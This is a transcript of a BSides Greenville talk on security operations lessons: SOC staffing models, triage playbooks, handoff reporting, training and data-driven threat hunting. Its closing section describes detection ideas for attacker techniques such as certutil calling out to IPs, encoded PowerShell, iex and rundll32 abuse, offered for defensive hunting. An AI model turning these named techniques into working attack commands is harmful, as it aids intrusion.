← All talks

Lessons Learned from Security Operations

BSides Greenville · 202135:3548 viewsPublished 2021-10Watch on YouTube ↗
Speakers
Tags
About this talk
Ryan Baisley shares lessons learned from security operations roles at two global life sciences organizations, covering operating models, incident reporting, data documentation, and detection strategies. The talk explores organizational structures, team dynamics, tool workflows, and practical approaches to building effective SOC processes for new analysts, managers, and those considering SecOps as a career path.
Show original YouTube description
Ever worked in security operations? For some people it is the first stop in their security journey. For others, it is the mystical and fascinating world of screens, command centers, blinky lights, and pew pew maps. For those new to SecOps, come learn some of the lessons I learned starting out. For managers and leaders, see what processes and strategies may be missing from your toolkit. For the new person to cyber, hear about what SecOps is like and get insight on if you want this to be a stop on your security journey. We'll cover lessons learned from my time in security operations at two global life sciences organizations - how they worked, what they did, and how they did it. www.bsidesgreenville.org @BSidesGVL
Show transcript [en]

we're going to go ahead and get started here i just get a sound check that someone can hear me all right thank you very much uh so do you want to run to our sponsors real quick thank them for their support i know we just outlined them in track one but for those who maybe didn't join opening remarks we really couldn't do this without our sponsors today so really thankful for elliot davis fordless utilsec lucy secure ideas dutonomy checkpoint tech refresh fortinet craig hook security secure it corelight crowdstrike defcon kivu and north greenville university cyber security program so really thankful for all of them their support this year coming out and supporting us in our virtual b signs

we're going to go ahead and get started since we're already five minutes late coming off opening remarks really appreciate the opportunity to speak today to kick us off so my name is ryan baisley i'm going to be our first speaker this morning then we'll we'll hand it over to the rest of the day talk today is lessons learned from my time in security operations i had the distinct privilege of doing some consulting work for two large life science organizations i really want to share some of the lessons learned today from my experience there this is definitely interactive and if you have any questions feel free to put them in the chat and then i will try to address those

there at the end uh and if there's any comments or whatever also remember to use the discord for some chat and communication ongoing afterwards i'll be around throughout the day so look forward to that so we'll go ahead and get jump jumped in so just a quick intro many of you may not know who i am i'm a husband a father i am a consultant i consider myself a relationship builder i am a born-again christian so that really formulates all i do it's at the center there i'm a lifelong learner i love working with non-profits i am one of our b-sides greenville organizers and i love to travel

so in consulting one of the opportunities i had was really defining a personal purpose and i thought this was important because it kind of sets up you know who i am what i do and drives into really the purpose of this talk and so really out my purpose is to find life's meaning so that we boldly reveal our true selves and one of my best i bring my purpose to life guided by a set of actions so i ask a lot of questions i try to encourage others and i try to serve others as much as possible and by living my purpose every day i actively build a world and i imagine a world in which people can seek out new

opportunities that challenge their potential where people feel validated in their decision making after receiving counsel and being encouraged and that people consider thoughtfully on what they want and are empowered to pursue their desires and this talk today really is to try and help people maybe experience a side of security you know we get a lot of students in these in these conversations which really appreciate people who are trying to enter the field and people who are well into their career may be looking for a change and so i hope that some lessons from today can help you understand and maybe challenge that potential that you have so the purpose for today we're going to explore some of the lessons learned from

security operations i'm going to share about the life i lived working in security operations and then at the end of the day we're going to try and encourage people maybe to give secops a try so the first lesson we're going to talk about is an operating model and the operating model is is really how an organization is structured and so like i said i had the opportunity to work at two life science organizations very large global entities and the first organization where i experienced security monitoring they had the following operating model so they had a u.s team lead and they had 12 analysts using an outsourced sock from a leading sock provider they operated 24x7

in the second organization i experienced they had a slightly different model where they actually had a u.s team lead still but then they had in-source analysts in what they call gdc's or global delivery centers and so they have four to eight analysts in mexico and they had four to eight analysts in india and each team would cover uh 13 hours or so in mexico 14 hours in india just based on the time differences and such and this really shared service model they were all in the same place you know that was pre-covered once cove would happen they all went home but it was you know this shared delivery center was more than just security operations

it was your networking team it was uh people who were over email and i found this really you know an interesting concept when i hadn't experienced before and so the second organization when i started they were doing this 24 by 7 by 365 but one of the things that i encountered really quickly when i was there was they the organization had some some challenging retention issues i guess we could say and they actually had to move back to a 24x5 model and escape that those weekend days uh so i learned here that varying operating models can work whether in house or outsourcing they both operated well i did feel that the bond of having this

in-house team was was much stronger with the team leads and with myself there was much more chemistry i felt the team operated at least in my opinion and from what i experienced at a higher level you know some of the challenges that these organizations faced both of them even in mexico romania india was we see this here in the us as well as as recruiting and retaining talent you know the going rate in mexico and india for talent had gone up significantly and the organization i was working with had faced some legacy hr challenges with finding uh equitable pay based on current data and so you know it was very people were finding that they

could go out and make more somewhere else and so they were they were losing these people one other thing i found interesting was in india they actually have a 90-day notice period and so what you would you'd find happening is someone would give their notice and then they would go and they would shop around so they may give their notice and have an offer in hand and once they do that they start shopping around for for another offer that's higher and so you would find people who you think you had on the hook to to take your job or take an opportunity to open wreck and then they would be gone because they'd find something else that was more

lucrative for them so it was something that was interesting i hadn't experienced before um due to that very lengthy notice period that's in india

so the second lesson learned was really the importance of having process and in the second organization i worked with this was a lion's share of what i was responsible for doing so we were responsible for building these triage playbooks these were focused more on actioning alerts and trying to weed out the noise and known behavior we had created a known behavior onenote you could use any note taking tool that could be easily shared across the team but this known behavior onenote was something we used very regularly in triaging incidents in their edr platform included items like known executables that may flag something known programs internal red team boxes vulnerability boxes that you know if you

saw something coming off it would you know light up like a christmas tree but really was internal activity we also had a known malicious behavior uh one note as well and we tracked in their behavior based on mitre and the attack framework what analysts would kind of review alerts against we also created these investigation playbooks and so these were focused more on deeper analysis but we had originally set out to match these categories outlined in the verizon data breach incident report we ended up scaling that back to roughly three playbooks that we felt like encompassed a majority of potential incidents and in our categories we ended up with malware gdos and a bucket of other

and really our key we had a couple key questions to answer and it took us a bit of time to kind of fine-tune these and what we were trying to accomplish so our key questions we ended up with were is the rant is this ransomware or credential theft has the activity been automatically blocked by a tool is the activity new is the activity spreading or is it localized is the activity malicious what's the source and is the threat action internal or external and so we tried to formulate questions and processes without being too prescriptive for the analysts but enough to give them to try and march down these questions to identify if something really was

malicious and needed to be actioned or quarantined the next thing we did is we created operations playbooks and these really focused on tool specific actions and tasks maybe better titled job aids in some organizations so we had a daily handoff you know between mexico and india that we had a defined process for servicenow how to enter tickets various security tools metrics and reporting and then non-standard software also developed some threat hunts they were focused on specific tools we had one for email threat hunting one for lol bins or living off the land binaries and we also had a specific one at the time there was a big influx of trick bot activity so we developed a specific trick bot threat

hunt as that was a prime item if you remember back in about a year and a half ago against the health sciences organizations as things were picking up with covid one of the things i also actually learned this from one of my colleagues in india was having this concept and idea and document of an ir or a sock cover book and this was one item that we added late in the engagement and it was really a an operations guide that contained a list of everything a new individual might need so it was the perfect document for this new hired and contained you know the org chart it contained what tools were used documentation repositories who

who was on the team where they were on the team because we we had found that you know we had a new hire come in in india so that person knew the india team fairly well but that person maybe had no clue who the person in the mexico team was because this organization the reporting structures didn't actually go up to the team leads they had managers in those delivery centers where everyone reported so we found this to be really helpful in people getting acclimated to the environment really quickly so lessons learned here you cannot document enough especially once the team lost these experienced analysts from that attrition that they've gone through in retention issues that documentation

played a key role in keeping the team engaged and up-to-date and what was going on and what they needed to do really we need to be thorough and think about what the new hires are going to need you know we knew once someone got into the swing of things you know they were going to be able to go through the investigation it was going to be kind of that you know rote memory they were going to know but we had to provide that initial foundation then my colleague had these three terms that you know they stick with me abc accuracy brevity and clarity keep those principles in mind when you're working through your documentation one of the challenges we faced was

knowing just simply what documentation to nix and what to keep and where to condense and where to combine you know people find this you have so much documentation sometimes how do you make it actionable and usable this was a challenge that we faced and we decided to like i said consolidate some of that documentation into just those three investigation playbooks uh so here's here's i got a couple examples of just some quick process flow charts that we developed we found that having different flow charts was was very helpful for an analyst who would visually represent and be able to identify the information they needed this was underpinned by some of that more extensive written documentation

i've seen this in multiple organizations and how they do that i had a great colleague who was able to develop these uh with with great precision and accuracy so this was one we had developed for uh the edr platform and then this is one we had developed for uh the messaging platform and how to evaluate email

next thing that we're gonna talk about is is simple reporting and keeping track of things there's so much information that's going on um and so we had to come up with some ways to to track everything that was going on and one of the big tools we used was onenote we used this for major incidents where we would track after a triage what was happening and realizing if something was bigger than a normal incident it could be triaged out or investigated in 15 20 30 minutes with maybe a little larger of an impact we'd open up a onenote so we'd start timelining what happened we'd have a decision log or a tree really almost thinking of like a

a raid blog basically you know what risks are we facing what are potential issues what assumptions are we making up to that point and then what decisions and actions are we taking we draft incident summaries it was a great place the team could add information draft those incident summaries that could then be elevated up to senior leadership we also had daily handoff reporting this was really a summary document of incidents found during the day what hunts the team was doing as far as threat hunts what needed to be handed off and picked up again we used one note for this found it to be really great we would go through those one notes for the daily handoffs

when we had our daily shift handoff calls and the team would kind of keep a pulse on what was going on of you that way yeah most organizations you know tracking stuff via tickets servicenow cherwell jira whatever it may be keeping that stuff updated with with information if you're able to to build that out and kind of dice out certain fields that makes reporting so much easier we also had a daily shift checklist so this would actually supplement our operations guide on the daily handoff it was really just a checklist of kind of a prioritized list of where the team should should start their day check the sock hotline check any relevant email inboxes if you have a

security mailbox uh reviewing tools in certain orders and then we had a weekly status update so we had the daily that we had the weekly and the weekly was a little bit higher level a little bit elevated so we gather highlights from the week we talk about maybe hr people development we'd review any new threat intel that came across from their internal cti team we'd go over items of interest and then if there were any itops related issues we would discuss those as well so lessons learned here much can happen over the course of the day let alone a week or a month we found that this onenote really helped us you know kind of keep track and it was

really easily searchable to go back through and look for a specific host name or or look for a application name and and maybe what incident then we could go back to the edr tool or we could then take use that as a launching point into the ticketing tool to go do a deeper investigation get some historical information on something look for anomalous metrics we're tracking all that metric look for something that's anomalous what is rare in your environment encourage your teams to document extensively what they find during the investigations put as much information you know as feasible and that doesn't impact you know speed of execution in the tickets because you'll find that information later to be

super valuable challenges we face documentation getting analysts to actually update with extensive notes throughout the investigation they'd keep an incident report on their desktop you know they'd be going through their thing and they'd pick it up the next day but sometimes they'd fail to update what they'd found in that report into the ticket and so during handoff or a weekend or a holiday uh you know some of this handover information that would be good for the person they wouldn't have it because it'd be on the desktop of the analyst

transition to operations this was uh one i actually learned at the first organization i was we were doing a managed uh mssp migration basically it merged with two companies and so we had to find a way to figure out everything that they managed and then moving over to the new organization and so we developed this thing called tops or transition to operations and so what we it was an excel spreadsheet it lists out each service offering each you know service area what the product was and then we would just you know track it across when we migrated it to the new organization so what does tops include weld includes things like architecture diagrams wiring diagrams ip and url information

vendor and admin manuals important processes such as health checks break fix config and change management patch management user management you know any quotes that were going back and forth copy of backup configurations if we were talking about a product like a firewall or uh any type of casbi tool we'd schedule functionality training between the two teams to make sure that team b who was coming on board knew what the world was going on in the organization and we kind of built this out into into phases so there was really the plan phase thinking from a project management perspective we had the plan we were building out how to transition what the products were going to be what end

products we wanted to have and then there was this transition phase and we really did it in two parts i'd say so we did what we called a passive parallel run where both organizations were running at the same time uh organization a the primary uh kind of still doing the day-to-day but organization b was was kind of watching over the shoulder and then once we were ready to transition we moved into what we called hyper care and so this was really kind of the transition point where everything moved to b and they were running it and a was now there kind of looking over the shoulder until the term date of the contract where a would no longer be there

here's just a quick glance at you know what our tops looked like you know simple spreadsheet gives you some ideas of what you can can do there and help track to make sure that your next transition of a tool or a service is successful

next thing we're talking about is training people training is super important um and what we did here at the second organization i worked with is we actually developed a skills matrix a training catalog you could say and we had listed out 20 different skills and we developed a skills catalog and then we took those skills and we mapped opportunities and training content free training content to them you know you see the discord and stuff there's uh there's there's sand stuff and some of that's expensive and free but they're offering free courses now this is like b-sides material and stuff maybe from a mandiant conference that's out there and so we built that into these kind of

big high level areas skills and then the matching training contents go with it and so let me show you an example here of kind of what we did so it gives you an idea this was a catalog then we would deliver to the team and then as they had time you know we had set out some required training you know so they could go through certain of these and then if they had extra time or if they wanted to go learn on their own this was additional content we found that based on these skill areas they could work through and match to to learn what the skill was the team also did external training now one of the

challenges we did find was so the the training provider was based here in the u.s we had people in mexico we had people in india so to get everyone on the same training schedule we really had to kind of flip the india schedule to to a later day and we would start at 6 central in the morning 6 a.m central and then we would go to it was like noon or two but noon or noon or two i don't remember which time in india it's like midnight for those folks so they have really late evenings so obviously that was what we had to do to make that work for both teams definitely a challenge we faced

we did i would say the lesson learned there is you know figure out that right timing if if you're using those type of delivery models or operating models with people in geographic areas and you have to do it that way but also make sure that those folks don't have to work so when we did training they did training eight hours for training in the day labs afterwards and they were done we everyone supported one another on the team where those who weren't working or taking or those who weren't training they were the ones working that week and then when they got the opportunity to train the following week we flipped it so they never had to worry about what was going

on in the estate

next thing we're going to talk about is the the life of the packet and i actually had the opportunity to do this on some internal initiatives and i learned that this gentleman who kind of developed this concept he used to run the cisco cisco stock and he termed at the life of the packet and so you break down your framework into really three areas operational tactical and strategic so operational you map each of your data sources to an outcome what do you hope to gain what do you hope to happen so for example and when i get to the next slide you'll see it and it'll make a little more sense i think but for like your network operations you

have your cisco stuff or your juniper stuff for it operations you have your servers you have domain controllers for security you have your endpoint your endpoint data is coming in firewall logs network activity uh windows logs i jumped there hold on there we go um windows log on who's logging on you know your your 4624 is your 46 25s process is being created on a host you have your tactical stuff okay so it's kind of that next level so think of it going across uh vertically on your screen tactical is really that time to detection so you you have the right data sources now you got to map those to the right skill set so you got to have your

windows expert you got to have your firewall expert so you map that skill set and then you map that to the outcome okay so going back to the netapp cisco what information are you going to gather there you're going to gather ip address port from your servers and your domain controllers you're going to gather dns information a dhcp account info asset and subnet information from your endpoints you'll gather post names hashes urls all right so then you move into that strategic bucket this is your time to mitigation and this is where you work to automate the known and investigate the unknown and then he had these uh three vectors of threats that he would talk about so you can only have three

vectors of threats you can have internal to internal internal to external or external to internal anytime you're talking about a threat it's going to be one of those three vectors all right so here's a here's a view of life of the packet okay so you see across the top this is a huge huge vizio sheet um so it doesn't accomplish all of it but you see your net op stuff so you got your cisco you got you know your various tools you got your it ops you got your servers domain controllers and then all of the information that kind of feeds into that you're feeding that into your sim that helps you make the the tactical

discussions you know you got your information domains ports ips statuses what domain what's the dns and you can move that into you know alerts case numbers and then that's where you move into the strategic you know what can you automate if you're remediating stuff and what do you need to investigate

i think this is my final item here this is being introspective with data so in the second organization i worked with really we had we had all these processes one of the things we really tried to dive into is looking into the data what types of alerts were we getting what were the hosts what hosts were receiving the alerts were there specific geographies that were receiving more alerts than others or were there specific business units or even down to the people of where people were receiving alerts or detections and then we tried to figure out if there were any trends so one of the things we did is trying to figure out what was rare in

the environment what incurred very very little and so one of these items we did was we looked at lol bins or these living off the land binaries of what occurred very infrequently in the environment and if we found one we would do an investigation so something like powershell in your environment most likely is happening so many times a day that if you just tried to filter out power shell it's not going to be actionable but maybe something like at.exe or bits admin occurs once in 30 days why does that occur every 30 days is it a specific host does it jump around or is it really an adversary so one of the other things we looked at

were potentially ips or domain names that are common so looking at long domain names or if something was say in like cert util calling out to an ip you know those would be very uh uncommon behaviors in the lol bins those could be potentially malicious and so we would look for those rare items and try and filter those out so this goes back to documenting those alerts types locations and making sure to document that thread intel over time you may have something that doesn't look right now or doesn't fit a profile now but maybe down the road it's something you see in your environment challenges we faced here finding rare can be really hard in a

large environment if especially if your teams don't know what good or bad looks like thankfully this organization we did have one individual who was a kind of the internal red team and so he kind of he coached us along on things he would do uh processes he would use we were going through purple team exercises and trying to find those detections in the in the edr tool and then we talked about what we did and so one of these items was obviously base64 coded power shell but not all base64 encoded power shell is bad you know some of it's used by system administrators to do legitimate things based on you know long complex commands they need to run

so what we did with that is we made a list of known good encoded strings and then once you're kind of investigating that you can say oh yeah those start with the first four end with the last four you know that's that's known good but then we'd also those ones that we didn't know those would be the ones we'd have to throw into cyber chef or some other tool to decode and see what was actually happening you know know how frequently something like invoke expression or iex is being used in your environment if you're able to search at a command line level looking for things that accompany string and then one of the ones we also did was

looking at run dll32 so run dll32 is if it if you're starting a dll through the command line which is typically abnormal it has to include the word start or space star and so we could formulate a command in the edr tool to you know look for the binary run dll32 and then include command line start or space start we were able to find some you know potentially malicious things that way and have the teams investigate further so this is just a simple you know we listed out all the binaries and we uh developed searches for them this maps to the lol bin project you can find it out on github um cisco's got an article right up about

top 13 binaries used by adversaries it's a few years old but still it's got some good information in it and then what we do is we go there and you see the far right side you see the volume so how often do this occur in the environment and so we'd run a search like that you know it includes multiple binaries there but we'd look for file name and command line we may have a couple and it would be a quick run through on the day you know anything look malicious here so that uh that concludes the the talk for this morning um any questions come up anything stand out to you anything as a nugget maybe you'll take back on

monday to your teams from a lesson learned that you'd like to share with the group i really do appreciate everyone's time this morning thank you for the opportunity to speak any questions let me read back through the uh the discord here real quick

cmap tools is a free tool for flowcharts and concept maps if you don't have access to vizio

check the chat here quantum has a strong onenote documentation program yep i it could be evernote it could be one onenote so simple these days it ties into uh you know teams uh thick clients on your computer we found that especially you know especially if you're going through an incident you know you may think you have compromise in your environment one note's a simple thing you could easily stand up if you're in a disconnected 365 tenant or you need to stand up a secondary tenant to run an incident or if you have certain tools in place that the team could quickly stand up start writing down notes what's going on um i don't know if i found something better

than one note to date yet it's really easy to and the other thing like i said going back and searching because the team when they would document incidents in that daily handoff we would kind of have them write out just a one-liner on incidents you know host name uh you know application that may have gotten flagged being able to quickly go into onenote and type out that application name and see if it's occurred in previous days or previous weeks or if it's something that incurred three months ago you know was a great jumping point to reference a servicenow ticket and go find

all right we'll really appreciate everyone

[ feedback ]